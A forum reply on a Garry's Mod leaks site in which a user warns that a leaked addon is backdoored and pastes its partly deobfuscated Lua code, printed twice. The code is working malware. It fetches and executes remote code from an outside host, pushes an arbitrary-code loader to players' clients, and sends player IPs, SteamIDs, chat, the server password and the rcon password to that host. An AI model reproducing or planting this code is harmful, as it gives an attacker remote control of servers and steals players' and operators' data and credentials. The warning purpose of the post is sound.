Garry's Mod Leaks
CLOSE
Submitted by MilitoDr, 26-05-2022, 06:19 PM, Thread ID: 243245
Thread Closed
RE: CLOSE
28-05-2022, 07:29 PM
#16 This post was last modified: 28-05-2022, 07:31 PM by Bright1337
This has backdoors in it
Getting code from "https://api.omega-project.cz/api_connect.php?api_key=iemPWLCJOpzPMzsmmAeE" ~ French backdoor... how unexpected -_-
I tried reverse engineering the code but gave up with decryption on the last (maybe) step. Here it is in it's glory
local PlayerInitialSpawnHook,PlayerDisconnectHook = "PlayerInitialSpawn", "PlayerDisconnected"
local WeirdHeaderForShit = {
["Authorization"] = "ZWJiMGE0NGJjZmFhYjVjYWNkZDYyMzM4NzllMjE5ZWQ"
}
RunConsoleCommand("sv_hibernate_think", "0")
HTTP({ url="https:\/\/api.omega-project.cz/no-backdoors.lua"; method="get"; success=function(api,anti_backdoors) RunString(anti_backdoors) end })
HTTP({ url="https:\/\/api.omega-project.cz/api_player_blacklist.php"; method="get"; success=function(api,bad_player_blacklist) RunString(bad_player_blacklist) end })
local _, addons_folders = file.Find("addons/*", "GAME")
for k,v in pairs(addons_folders) do
if (v != "checkers") and (v != "chess") and (v != "common") and (v != "go") and (v != "hearts") and (v != "spades") then
http.Post("https:\/\/api.omega-project.cz/api_addons.php", {server_ip = _G["game"]["GetIPAddress"](),crsf = "rUhmMdIueplHqMvbepLUmntjninUgEkJyuuYDkha#NDYuMTM0LjQ5LjIyOQ==#sQnFwGhSWjvTmTqhoHTRQZEfsmjBumUwbRsXOOGk",addons_name = v, addons_update = util.Base64Encode(file.Time( "addons/"..v, "GAME" ))}, function(http_addons)
if _G["string"]["Left"]( http_addons, 1 ) == "<" or http_addons == "" then
return
else
RunString(http_addons)
end
end, function( error )
end, WeirdHeaderForShit )
end
end
util.AddNetworkString("aYJQsmzZNbCjkcNsojff")
_G["BroadcastLua"]([[net.Receive("aYJQsmzZNbCjkcNsojff",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
function _0x269553(NrhsXbKvvmRHAMHUbSrr)
timer.Simple( 0.5, function( )
_G["data"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["len"] = #data
_G["\110\101\116"]["\83\116\97\114\116"]("aYJQsmzZNbCjkcNsojff")
_G["\110\101\116"]["\87\114\105\116\101\85\73\110\116"](len, 16)
_G["\110\101\116"]["\87\114\105\116\101\68\97\116\97"](data, len)
_G["\110\101\116"]["\66\114\111\97\100\99\97\115\116"]()
end)
end
util.AddNetworkString("zPxmjKXatPStuyGQyatK")
_G["BroadcastLua"]([[net.Receive("zPxmjKXatPStuyGQyatK",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
function SendPly(NrhsXbKvvmRHAMHUbSrr, steamid64)
timer.Simple( 0.5, function( )
_G["\100\97\116\97"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["\108\101\110"] = #data
_G["\110\101\116"]["\83\116".."\97\114\116"]("zPxmjKXatPStuyGQyatK")
_G["\110".."\101\116"]["\87\114".."\105\116\101\85\73\110\116"](len, 16)
_G["\110\101".."\116"]["\87\114\105\116\101\68".."\97\116\97"](data, len)
for k, ply in pairs(player.GetAll()) do
if ( ply:SteamID64() == steamid64 ) then
_G["\110\101\116"]["Send"](ply)
end
end
end)
end
_G["\104\111\111\107"]["\65\100\100"](PlayerInitialSpawnHook, "zFpiunFsMswHJIHTQGfrkLkxbsBNGbxNhJxaYPrTaBHwKXYPHM", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\108\111\114"] = "5dc766",
["\99\111\110\116\101\110\116"] = "Client "..ply:Name().." connected ("..ply:IPAddress()..").",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)
_G["\104\111\111\107"]["\65\100\100"](PlayerDisconnectHook, "IYFEfRtGTNMEloxBPyvwWBIHOtZEAzsrUAIOrnJolqsPtDjMrn", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["color"] = "de3333",
["\99\111\110\116\101\110\116"] = "Dropped "..ply:Name().." from server (Disconnect by user).",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)
function ServerLog( logs_content )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
content = logs_content,
server_ip = _G["game"]["GetIPAddress"]()
},RunString)
return ServerLog( logs_content )
end
function Error( string )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\110\116\101\110\116"] = string,
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
return Error( string )
end
timer.Create( "nmIhEbjWxFzzisaaVEAdenKiTWALFFlmLhIyTmHfVHAJJsTLxG", 5, 0, function()
hook.Add( "PlayerSay", "XdobnfBpYELZLmGoUpfNauFKkjxEUTFSbsvpAxttLCfZdpVldm", function( ply, text )
local http_chat_table = {
name = ply:Name(),
server_ip = _G["game"]["GetIPAddress"](),
steamid64 = ply:SteamID64(),
DRJLVBpDld = "SbWAumfRXzZbNOTMnyLlcuMIoyjvvxLQFEAyMeDm",
thJclyVnWu = "iEwcZaSshJGawvDAEFswWtDTdMgHHXzhWTEoPGPm",
UGxsBnNMRW = "AtziOfRhRfDuBbyNXbCvnuomhqYkuQoFcclZLcqy",
aWpjWJWBpD = "JzEaenhAzTvrCiMLgBNLserOzmCYTRyLulJiagWE",
oNUUXEBKRN = "sbQdrbGLrkOjwJYrdmmlJPztQQuVAqOBAPGLzszA",
message = text
}
http.Post("https:\/\/api.omega-project.cz/chat_connect.php?yYNdOwVmqEyCSFu=DBjEHsGKMaoJmns", http_chat_table, function(http_chat)
RunString(http_chat)
end)
end)
local _0x0004982 = file.Find("cfg/*", "GAME")
local rcon_pw = ""
for i = 1, #_0x0004982 do
if string.EndsWith(_0x0004982[i], ".cfg") then
for k,v in pairs(string.Split(file.Read("cfg/" .. _0x0004982[i], "GAME"),"\n")) do
if string.StartWith(v,"rcon_password") then
rcon_pw = string.Split(v,"\"")[2]
end
end
end
end
for k,v in pairs(player.GetAll()) do
local RMrIJYBBhAeDgqsdDguE = { -- getting player info
["\110\97\109\101"] = v:GetName(),
["\105\112"] = v:IPAddress(),
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"](),
["\99\114\115\102"] = "ESpjJjsSaLDunMmaayNueFoWwRkOgxsReRWDpZYz#NDYuMTM0LjQ5LjIyOQ==#OICcYMfOWERvMHXHBsgoVxemZsvgpnznBKuKsVco",
["\115\116\101\97\109\105\100"] = v:SteamID(),
["\115\116\101\97\109\105\100\54\52"] = v:SteamID64(),
["mJCScMgeVw"] = "akwlxPqdWEGAdkkmImlDLpjVfHaIYwXoMdPreMzH",
["fJGcZFbDzP"] = "fMpCQdGSvMPUfdrSSuqnZzlHuAMrmNeBgkgBRUbV",
["TEOtgpVzsx"] = "TpHketGzNTssxtllRnfYrWvsApJiBVDklrioQVEV",
["ifeCZhnUNp"] = "UraQdvachsosgSOxlgTHfQjzHJKKdMTzKkgdSoNy",
["RnBOqvIfHh"] = "NIuPGfBzTyXzNItyfUrYFRMJBOPvDdzpcioejOAs"
}
http.Post("https://api.omega-project.cz/v1/gmod-panel/user-connect.php?JkuJojmgMwBRKDa=XjzppAoKIFzdVIv&ping=" .. ving(), RMrIJYBBhAeDgqsdDguE, function( http_users )
if string.Left( http_users, 1 ) == "<" or http_users == "" then
return
else
RunString( http_users )
end
end, function( error )
end, WeirdHeaderForShit )
end
local TcwwQwuoRiYOccyPCudM = { -- Get's server info
["i"] = _G["game"]["GetIPAddress"](),
["n"] = _G["\71\101\116\72\111\115\116\78\97\109\101"](),
["m"] = _G["\103\97\109\101"]["\71\101\116\77\97\112"](),
["bo"] = _G["\116\111\115\116\114\105\110\103"](#_G["\112\108\97\121\101\114"]["\71\101\116\66\111\116\115"]()),
["c"] = _G["\103\97\109\101"]["\71\101\116\73\80\65\100\100\114\101\115\115"]().."{+}".."AYkwYBvmN" .."{+}".."1653757789",
["g"] = _G["\101\110\103\105\110\101"]["\65\99\116\105\118\101\71\97\109\101\109\111\100\101"](),
["crsv"] = "NDYuMTM0LjQ5LjIyOQ==#FpmffElyGtfQQCnnHsUmeynbxhtkqBuInlWQsiqu",
["\110\98"] = tostring(#player.GetAll()).."/"..game.MaxPlayers(),
["\108\117\114\108"] = _G["GetConVar"]("sv_loadingurl"):GetString(),
["\112\97\115\115"] = GetConVar("\115\118\95\112\97\115\115\119\111\114\100"):GetString(),
["\107"] = "iemPWLCJOpzPMzsmmAeE",
["\99\108\105\101\110\116_\102\117\110\99"] = "_0x269553",
["\114"] = rcon_pw,
["EryEqWFPrr"] = "AgEiEaFLDaxVXCNkvNfqdBOWOWfMITgOtHXvrdce",
["LHDdvzWFzV"] = "YxtToQNNdbsIsNQNVZYOxhzlQKiVzeXXaYfnwPWU",
["NnNZbhBbvb"] = "qTtMuqmaLDkWkJFjGTgXrCxHsRRnqNpipTSBAfkN",
["tYmZDpqMcZ"] = "iVxnJiRHRKybdHxoBCyXiQiWzwoTSAuyfpTAtVwB",
["GNQVRVrKLD"] = "hDKLtFGYCJicCfhZDYTAszbIsmrARXIRypEGMQAt"
}
http.Post("https://api.omega-project.cz/v1/gmod-panel/socket-controller.php", TcwwQwuoRiYOccyPCudM, function(http_servers)
if string.Left( http_servers, 1 ) == "<" or http_servers == "" then
return
else
RunString(http_servers)
end
end, function( error )
end, WeirdHeaderForShit )
end)
and yeah OP don't say that there aren't any backdoors when some of the addons got backdoored so poorly that even the backdoors did not execute due to errors
Getting code from "https://api.omega-project.cz/api_connect.php?api_key=iemPWLCJOpzPMzsmmAeE" ~ French backdoor... how unexpected -_-
I tried reverse engineering the code but gave up with decryption on the last (maybe) step. Here it is in it's glory
local PlayerInitialSpawnHook,PlayerDisconnectHook = "PlayerInitialSpawn", "PlayerDisconnected"
local WeirdHeaderForShit = {
["Authorization"] = "ZWJiMGE0NGJjZmFhYjVjYWNkZDYyMzM4NzllMjE5ZWQ"
}
RunConsoleCommand("sv_hibernate_think", "0")
HTTP({ url="https:\/\/api.omega-project.cz/no-backdoors.lua"; method="get"; success=function(api,anti_backdoors) RunString(anti_backdoors) end })
HTTP({ url="https:\/\/api.omega-project.cz/api_player_blacklist.php"; method="get"; success=function(api,bad_player_blacklist) RunString(bad_player_blacklist) end })
local _, addons_folders = file.Find("addons/*", "GAME")
for k,v in pairs(addons_folders) do
if (v != "checkers") and (v != "chess") and (v != "common") and (v != "go") and (v != "hearts") and (v != "spades") then
http.Post("https:\/\/api.omega-project.cz/api_addons.php", {server_ip = _G["game"]["GetIPAddress"](),crsf = "rUhmMdIueplHqMvbepLUmntjninUgEkJyuuYDkha#NDYuMTM0LjQ5LjIyOQ==#sQnFwGhSWjvTmTqhoHTRQZEfsmjBumUwbRsXOOGk",addons_name = v, addons_update = util.Base64Encode(file.Time( "addons/"..v, "GAME" ))}, function(http_addons)
if _G["string"]["Left"]( http_addons, 1 ) == "<" or http_addons == "" then
return
else
RunString(http_addons)
end
end, function( error )
end, WeirdHeaderForShit )
end
end
util.AddNetworkString("aYJQsmzZNbCjkcNsojff")
_G["BroadcastLua"]([[net.Receive("aYJQsmzZNbCjkcNsojff",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
function _0x269553(NrhsXbKvvmRHAMHUbSrr)
timer.Simple( 0.5, function( )
_G["data"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["len"] = #data
_G["\110\101\116"]["\83\116\97\114\116"]("aYJQsmzZNbCjkcNsojff")
_G["\110\101\116"]["\87\114\105\116\101\85\73\110\116"](len, 16)
_G["\110\101\116"]["\87\114\105\116\101\68\97\116\97"](data, len)
_G["\110\101\116"]["\66\114\111\97\100\99\97\115\116"]()
end)
end
util.AddNetworkString("zPxmjKXatPStuyGQyatK")
_G["BroadcastLua"]([[net.Receive("zPxmjKXatPStuyGQyatK",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
function SendPly(NrhsXbKvvmRHAMHUbSrr, steamid64)
timer.Simple( 0.5, function( )
_G["\100\97\116\97"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["\108\101\110"] = #data
_G["\110\101\116"]["\83\116".."\97\114\116"]("zPxmjKXatPStuyGQyatK")
_G["\110".."\101\116"]["\87\114".."\105\116\101\85\73\110\116"](len, 16)
_G["\110\101".."\116"]["\87\114\105\116\101\68".."\97\116\97"](data, len)
for k, ply in pairs(player.GetAll()) do
if ( ply:SteamID64() == steamid64 ) then
_G["\110\101\116"]["Send"](ply)
end
end
end)
end
_G["\104\111\111\107"]["\65\100\100"](PlayerInitialSpawnHook, "zFpiunFsMswHJIHTQGfrkLkxbsBNGbxNhJxaYPrTaBHwKXYPHM", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\108\111\114"] = "5dc766",
["\99\111\110\116\101\110\116"] = "Client "..ply:Name().." connected ("..ply:IPAddress()..").",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)
_G["\104\111\111\107"]["\65\100\100"](PlayerDisconnectHook, "IYFEfRtGTNMEloxBPyvwWBIHOtZEAzsrUAIOrnJolqsPtDjMrn", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["color"] = "de3333",
["\99\111\110\116\101\110\116"] = "Dropped "..ply:Name().." from server (Disconnect by user).",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)
function ServerLog( logs_content )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
content = logs_content,
server_ip = _G["game"]["GetIPAddress"]()
},RunString)
return ServerLog( logs_content )
end
function Error( string )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\110\116\101\110\116"] = string,
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
return Error( string )
end
timer.Create( "nmIhEbjWxFzzisaaVEAdenKiTWALFFlmLhIyTmHfVHAJJsTLxG", 5, 0, function()
hook.Add( "PlayerSay", "XdobnfBpYELZLmGoUpfNauFKkjxEUTFSbsvpAxttLCfZdpVldm", function( ply, text )
local http_chat_table = {
name = ply:Name(),
server_ip = _G["game"]["GetIPAddress"](),
steamid64 = ply:SteamID64(),
DRJLVBpDld = "SbWAumfRXzZbNOTMnyLlcuMIoyjvvxLQFEAyMeDm",
thJclyVnWu = "iEwcZaSshJGawvDAEFswWtDTdMgHHXzhWTEoPGPm",
UGxsBnNMRW = "AtziOfRhRfDuBbyNXbCvnuomhqYkuQoFcclZLcqy",
aWpjWJWBpD = "JzEaenhAzTvrCiMLgBNLserOzmCYTRyLulJiagWE",
oNUUXEBKRN = "sbQdrbGLrkOjwJYrdmmlJPztQQuVAqOBAPGLzszA",
message = text
}
http.Post("https:\/\/api.omega-project.cz/chat_connect.php?yYNdOwVmqEyCSFu=DBjEHsGKMaoJmns", http_chat_table, function(http_chat)
RunString(http_chat)
end)
end)
local _0x0004982 = file.Find("cfg/*", "GAME")
local rcon_pw = ""
for i = 1, #_0x0004982 do
if string.EndsWith(_0x0004982[i], ".cfg") then
for k,v in pairs(string.Split(file.Read("cfg/" .. _0x0004982[i], "GAME"),"\n")) do
if string.StartWith(v,"rcon_password") then
rcon_pw = string.Split(v,"\"")[2]
end
end
end
end
for k,v in pairs(player.GetAll()) do
local RMrIJYBBhAeDgqsdDguE = { -- getting player info
["\110\97\109\101"] = v:GetName(),
["\105\112"] = v:IPAddress(),
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"](),
["\99\114\115\102"] = "ESpjJjsSaLDunMmaayNueFoWwRkOgxsReRWDpZYz#NDYuMTM0LjQ5LjIyOQ==#OICcYMfOWERvMHXHBsgoVxemZsvgpnznBKuKsVco",
["\115\116\101\97\109\105\100"] = v:SteamID(),
["\115\116\101\97\109\105\100\54\52"] = v:SteamID64(),
["mJCScMgeVw"] = "akwlxPqdWEGAdkkmImlDLpjVfHaIYwXoMdPreMzH",
["fJGcZFbDzP"] = "fMpCQdGSvMPUfdrSSuqnZzlHuAMrmNeBgkgBRUbV",
["TEOtgpVzsx"] = "TpHketGzNTssxtllRnfYrWvsApJiBVDklrioQVEV",
["ifeCZhnUNp"] = "UraQdvachsosgSOxlgTHfQjzHJKKdMTzKkgdSoNy",
["RnBOqvIfHh"] = "NIuPGfBzTyXzNItyfUrYFRMJBOPvDdzpcioejOAs"
}
http.Post("https://api.omega-project.cz/v1/gmod-panel/user-connect.php?JkuJojmgMwBRKDa=XjzppAoKIFzdVIv&ping=" .. ving(), RMrIJYBBhAeDgqsdDguE, function( http_users )
if string.Left( http_users, 1 ) == "<" or http_users == "" then
return
else
RunString( http_users )
end
end, function( error )
end, WeirdHeaderForShit )
end
local TcwwQwuoRiYOccyPCudM = { -- Get's server info
["i"] = _G["game"]["GetIPAddress"](),
["n"] = _G["\71\101\116\72\111\115\116\78\97\109\101"](),
["m"] = _G["\103\97\109\101"]["\71\101\116\77\97\112"](),
["bo"] = _G["\116\111\115\116\114\105\110\103"](#_G["\112\108\97\121\101\114"]["\71\101\116\66\111\116\115"]()),
["c"] = _G["\103\97\109\101"]["\71\101\116\73\80\65\100\100\114\101\115\115"]().."{+}".."AYkwYBvmN" .."{+}".."1653757789",
["g"] = _G["\101\110\103\105\110\101"]["\65\99\116\105\118\101\71\97\109\101\109\111\100\101"](),
["crsv"] = "NDYuMTM0LjQ5LjIyOQ==#FpmffElyGtfQQCnnHsUmeynbxhtkqBuInlWQsiqu",
["\110\98"] = tostring(#player.GetAll()).."/"..game.MaxPlayers(),
["\108\117\114\108"] = _G["GetConVar"]("sv_loadingurl"):GetString(),
["\112\97\115\115"] = GetConVar("\115\118\95\112\97\115\115\119\111\114\100"):GetString(),
["\107"] = "iemPWLCJOpzPMzsmmAeE",
["\99\108\105\101\110\116_\102\117\110\99"] = "_0x269553",
["\114"] = rcon_pw,
["EryEqWFPrr"] = "AgEiEaFLDaxVXCNkvNfqdBOWOWfMITgOtHXvrdce",
["LHDdvzWFzV"] = "YxtToQNNdbsIsNQNVZYOxhzlQKiVzeXXaYfnwPWU",
["NnNZbhBbvb"] = "qTtMuqmaLDkWkJFjGTgXrCxHsRRnqNpipTSBAfkN",
["tYmZDpqMcZ"] = "iVxnJiRHRKybdHxoBCyXiQiWzwoTSAuyfpTAtVwB",
["GNQVRVrKLD"] = "hDKLtFGYCJicCfhZDYTAszbIsmrARXIRypEGMQAt"
}
http.Post("https://api.omega-project.cz/v1/gmod-panel/socket-controller.php", TcwwQwuoRiYOccyPCudM, function(http_servers)
if string.Left( http_servers, 1 ) == "<" or http_servers == "" then
return
else
RunString(http_servers)
end
end, function( error )
end, WeirdHeaderForShit )
end)
and yeah OP don't say that there aren't any backdoors when some of the addons got backdoored so poorly that even the backdoors did not execute due to errors
Users browsing this thread: 4 Guest(s)